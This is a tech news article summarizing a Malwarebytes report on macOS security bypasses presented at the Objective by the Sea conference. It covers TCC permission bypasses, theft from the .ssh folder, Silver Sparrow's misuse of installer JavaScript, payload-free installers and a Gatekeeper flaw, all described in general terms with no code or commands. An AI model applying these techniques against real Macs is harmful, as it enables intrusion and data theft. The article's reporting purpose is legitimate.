Researchers demonstrate new methods of bypassing macOS security

article thumbnail

AppleInsider is supported by its audience and may earn commission as an Amazon Associate and affiliate partner on qualifying purchases. These affiliate partnerships do not influence our editorial content.

Although Apple has taken steps to shore up the security of its macOS platform, vulnerabilities are still surfacing that could bypass some of its most important protections..

According to a new report from cybersecurity firm Malwarebytes, a handful of vulnerabilities and exploits shown off at the Objective by the Sea conference illustrate how Mac-targeting attacks are evolving. OBTS is the only security conference that focuses solely on Apple devices and products.

For example, security researchers demonstrated two attacks that bypassed Apple's Transparency, Consent, and Control systems — mechanisms that requiring user content to access specific data.

One attack involved a remote attacker with root permissions granting data access to a malicious process by simply creating a new user on the system and having that user grant the permissions. Another vulnerability leveraged mount points for disk image files. Basically, the researcher was able to modify a specific permissions database and grant TCC permissions to pretty much any process.

Another vulnerability demonstrated at the OBTS conference deals with what types of data the Mac's TCC protections defend. For example, malware can potentially collect data from the .ssh folder, which is used to store certificates that authenticate connections. This, according to Malwarebytes, could allow an attacker to "move around" an organization's infrastructure if they gained access to that folder.

macOS installers

Other attacks that made an appearance during the OBTS conference include ones that target or bypass Apple's installer protections.

The Silver Sparrow malware, for example, uses the Distribution file on a Mac system, which is used to convey information and options for an installer. JavaScript code can be run in the Distribution file, opening up a door for potential attacks.

Specifically, Silver Sparrow used a script initially meant to check if a system met installation requirements to download and install malware covertly.

Another way to bypass Apple's installation protections include payload-free installers. These are essentially installers that don't install anything. Instead, they are a shell for a script that runs an installation process.

At least two more vulnerabilities were discussed at OBTS, including installer plugins that were crafted maliciously to install payloads on a system and a flaw in macOS that could allow a Mac app to entirely bypass Gatekeeper.

More information about the vulnerabilities and the researchers who discovered them can be found on Malwarebytes' blog.